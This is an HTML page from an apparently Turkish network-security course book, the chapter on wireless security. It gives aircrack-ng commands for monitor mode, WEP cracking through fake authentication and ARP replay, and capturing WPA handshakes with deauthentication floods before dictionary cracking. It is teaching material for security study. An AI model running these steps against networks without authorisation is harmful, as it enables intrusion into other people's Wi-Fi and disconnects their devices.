<!DOCTYPE HTML>
<html lang="en" class="sidebar-visible no-js">
    <head>
        <!-- Book generated using mdBook -->
        <meta charset="UTF-8">
        <title>Kablosuz Güvenliği - MAOYYK2018</title>
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <meta name="description" content="Ağ Güvenliği ve Denetimi Kursu Notları">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="theme-color" content="#ffffff" />

        <link rel="shortcut icon" href="favicon.png">
        <link rel="stylesheet" href="css/variables.css">
        <link rel="stylesheet" href="css/general.css">
        <link rel="stylesheet" href="css/chrome.css">
        <link rel="stylesheet" href="css/print.css" media="print">

        <!-- Fonts -->
        <link rel="stylesheet" href="FontAwesome/css/font-awesome.css">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">
        <link href="https://fonts.googleapis.com/css?family=Source+Code+Pro:500" rel="stylesheet" type="text/css">

        <!-- Highlight.js Stylesheets -->
        <link rel="stylesheet" href="highlight.css">
        <link rel="stylesheet" href="tomorrow-night.css">
        <link rel="stylesheet" href="ayu-highlight.css">

        <!-- Custom theme stylesheets -->
        

        
    </head>
    <body class="light">
        <!-- Provide site root to javascript -->
        <script type="text/javascript">var path_to_root = "";</script>

        <!-- Work around some values being stored in localStorage wrapped in quotes -->
        <script type="text/javascript">
            try {
                var theme = localStorage.getItem('mdbook-theme');
                var sidebar = localStorage.getItem('mdbook-sidebar');

                if (theme.startsWith('"') && theme.endsWith('"')) {
                    localStorage.setItem('mdbook-theme', theme.slice(1, theme.length - 1));
                }

                if (sidebar.startsWith('"') && sidebar.endsWith('"')) {
                    localStorage.setItem('mdbook-sidebar', sidebar.slice(1, sidebar.length - 1));
                }
            } catch (e) { }
        </script>

        <!-- Set the theme before any content is loaded, prevents flash -->
        <script type="text/javascript">
            var theme;
            try { theme = localStorage.getItem('mdbook-theme'); } catch(e) { } 
            if (theme === null || theme === undefined) { theme = 'light'; }
            document.body.className = theme;
            document.querySelector('html').className = theme + ' js';
        </script>

        <!-- Hide / unhide sidebar before it is displayed -->
        <script type="text/javascript">
            var html = document.querySelector('html');
            var sidebar = 'hidden';
            if (document.body.clientWidth >= 1080) {
                try { sidebar = localStorage.getItem('mdbook-sidebar'); } catch(e) { }
                sidebar = sidebar || 'visible';
            }
            html.classList.remove('sidebar-visible');
            html.classList.add("sidebar-" + sidebar);
        </script>

        <nav id="sidebar" class="sidebar" aria-label="Table of contents">
            <ol class="chapter"><li class="affix"><a href="AgDenetimiveGuvenligi.html">Ağ Denetimi ve Güvenliği Giriş</a></li><li><a href="NetworkTemelleri.html"><strong aria-hidden="true">1.</strong> Ağ Temelleri</a></li><li><ol class="section"><li><a href="OSIKatmanlari.html"><strong aria-hidden="true">1.1.</strong> OSI Katmanları</a></li><li><a href="Subnet.html"><strong aria-hidden="true">1.2.</strong> Subnet (Alt Ağ)</a></li><li><a href="TcpIpProtokol.html"><strong aria-hidden="true">1.3.</strong> TCP/IP Protokol Kümesi</a></li><li><a href="TcpUdp.html"><strong aria-hidden="true">1.4.</strong> TCP/UDP</a></li><li><a href="DNS.html"><strong aria-hidden="true">1.5.</strong> DNS</a></li><li><a href="ICMPv4.html"><strong aria-hidden="true">1.6.</strong> ICMPv4</a></li><li><a href="ARP.html"><strong aria-hidden="true">1.7.</strong> ARP</a></li><li><a href="DHCP.html"><strong aria-hidden="true">1.8.</strong> DHCP</a></li></ol></li><li><a href="BilgiGuvenligi.html"><strong aria-hidden="true">2.</strong> Bilgi Güvenliği</a></li><li><ol class="section"><li><a href="OSINT.html"><strong aria-hidden="true">2.1.</strong> OSINT</a></li><li><a href="Aktif.html"><strong aria-hidden="true">2.2.</strong> Aktif Tarama</a></li><li><a href="AgGuvenligi.html"><strong aria-hidden="true">2.3.</strong> Ağ Güvenliği</a></li><li><a href="DNSZehirlenmesi.html"><strong aria-hidden="true">2.4.</strong> DNS Zehirlemesi</a></li><li><a href="Zafiyet.html"><strong aria-hidden="true">2.5.</strong> Zafiyet Tespiti</a></li><li><a href="CTF.html"><strong aria-hidden="true">2.6.</strong> CTF</a></li><li><a href="Kablosuz.html" class="active"><strong aria-hidden="true">2.7.</strong> Kablosuz Güvenliği</a></li></ol></li></ol>
        </nav>

        <div id="page-wrapper" class="page-wrapper">

            <div class="page">
                
                <div id="menu-bar" class="menu-bar">
                    <div id="menu-bar-sticky-container">
                        <div class="left-buttons">
                            <button id="sidebar-toggle" class="icon-button" type="button" title="Toggle Table of Contents" aria-label="Toggle Table of Contents" aria-controls="sidebar">
                                <i class="fa fa-bars"></i>
                            </button>
                            <button id="theme-toggle" class="icon-button" type="button" title="Change theme" aria-label="Change theme" aria-haspopup="true" aria-expanded="false" aria-controls="theme-list">
                                <i class="fa fa-paint-brush"></i>
                            </button>
                            <ul id="theme-list" class="theme-popup" aria-label="Themes" role="menu">
                                <li role="none"><button role="menuitem" class="theme" id="light">Light <span class="default">(default)</span></button></li>
                                <li role="none"><button role="menuitem" class="theme" id="rust">Rust</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="coal">Coal</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="navy">Navy</button></li>
                                <li role="none"><button role="menuitem" class="theme" id="ayu">Ayu</button></li>
                            </ul>
                            
                            <button id="search-toggle" class="icon-button" type="button" title="Search. (Shortkey: s)" aria-label="Toggle Searchbar" aria-expanded="false" aria-keyshortcuts="S" aria-controls="searchbar">
                                <i class="fa fa-search"></i>
                            </button>
                            
                        </div>

                        <h1 class="menu-title">MAOYYK2018</h1> 

                        <div class="right-buttons">
                            <a href="print.html" title="Print this book" aria-label="Print this book">
                                <i id="print-button" class="fa fa-print"></i>
                            </a>
                        </div>
                    </div>
                </div>

                
                <div id="search-wrapper" class="hidden">
                    <form id="searchbar-outer" class="searchbar-outer">
                        <input type="search" name="search" id="searchbar" name="searchbar" placeholder="Search this book ..." aria-controls="searchresults-outer" aria-describedby="searchresults-header">
                    </form>
                    <div id="searchresults-outer" class="searchresults-outer hidden">
                        <div id="searchresults-header" class="searchresults-header"></div>
                        <ul id="searchresults">
                        </ul>
                    </div>
                </div>
                

                <!-- Apply ARIA attributes after the sidebar and the sidebar toggle button are added to the DOM -->
                <script type="text/javascript">
                    document.getElementById('sidebar-toggle').setAttribute('aria-expanded', sidebar === 'visible');
                    document.getElementById('sidebar').setAttribute('aria-hidden', sidebar !== 'visible');
                    Array.from(document.querySelectorAll('#sidebar a')).forEach(function(link) {
                        link.setAttribute('tabIndex', sidebar === 'visible' ? 0 : -1);
                    });
                </script>

                <div id="content" class="content">
                    <main>
                        <p>Kablosuz ağ güvenliği için eğer donanım monitör modunu desteklemiyorsa harici
bir ağ kartına ihtiyaç vardır.</p>
<p>Donanımı dinleme moduna almak gerekiyor.</p>
<pre><code>airmon-ng start wlan0 # wlan0 --&gt; wlan0mon
</code></pre>
<p>Etraftaki sinyalleri görmek için airodump-ng kullanılır.</p>
<pre><code>airodump-ng wlan0mon
</code></pre>
<p>Donanımı dinleme modundan çıkarmak için.</p>
<pre><code>airmon-ng stop wlan0 # wlan0mon --&gt; wlan0
</code></pre>
<hr />
<p><strong>BSSID:</strong> Kablosuz kartının fiziki mac adresi</p>
<p><strong>PWR:</strong> Yayının sinyal gücü</p>
<p><strong>Beacon:</strong> Kablosuz yönetimi için kullanılan çeşitli yönetim paketlerinin
sayısı</p>
<p><strong>Data:</strong> Beacon harici geri kalan paketlerin sayısı</p>
<p><strong>CH:</strong> Hangi kanalda yayın yaptığını gösterir</p>
<p><strong>ENC:</strong> Şifreleme yöntemi</p>
<p><strong>CIPHER:</strong> Şifreleme türü. CCMP -&gt; AES</p>
<p><strong>AUTH:</strong> Önceden paylaşımlı anahtar(PSK), MGT veya OPEN gibi kimlik doğrulama
yöntemini gösterir</p>
<p><strong>ESSID:</strong> Kablosuz yayının ismi</p>
<p><strong>[!] airodump-ng -a parametresiyle sadece bağlı olan clientler
gösterilebilir</strong></p>
<hr />
<p><strong>WEP</strong></p>
<p>Üst taraftaki tablodan bu bilgiler elde edildikten sonra alt taraftaki tablodan
da kablosuz ağa bağlanmış veya bağlanmaya çalışan diğer cihazları görebiliriz.</p>
<p>Tek bir erişim noktasını dinlemek için kanal, mac adresi vermek yeterliyken
daha sonra şifreyi bulabilmek için -w parametresiyle trafiği kayıt edebiliriz.</p>
<pre><code>airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon
</code></pre>
<p>Alınan paketlerin sayısını arttırmak için sahte bir oturumla arp paketlerini kullanarak şansımızı arttırabiliriz.</p>
<pre><code>aireplay-ng --fakeauth 1 wlp1s0mon -a #bssid
aireplay-ng --arpreplay wlp1s0mon -b #bssid
</code></pre>
<p>Yeterli pakete ulaşılması durumunda aircrack-ng kullanılarak kırılabilir.</p>
<pre><code>aircrack-ng pcap
</code></pre>
<hr />
<p><strong>WPA</strong></p>
<pre><code>airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon
</code></pre>
<p>Handshake yakalamak için deauth paketi gönderilebilir.</p>
<pre><code>aireplay-ng -0 100 -a #AccessPoint -c #Client wlan0mon
</code></pre>
<p>Dinlemeye başladıktan sonra <strong>WPA HANDSHAKE</strong> yakalandığında dinlemeyi bırakıp
oluşturulan pcap dosyasını aircrack ile sözlük saldırısı kullanılarak
kırılabilir.</p>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                        
                            <a rel="prev" href="CTF.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                                <i class="fa fa-angle-left"></i>
                            </a>
                        

                        

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                
                    <a href="CTF.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
                        <i class="fa fa-angle-left"></i>
                    </a>
                

                
            </nav>

        </div>

        

        

        

        
        <script src="elasticlunr.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="mark.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="searcher.js" type="text/javascript" charset="utf-8"></script>
        

        <script src="clipboard.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="highlight.js" type="text/javascript" charset="utf-8"></script>
        <script src="book.js" type="text/javascript" charset="utf-8"></script>

        <!-- Custom JS scripts -->
        

        

    </body>
</html>
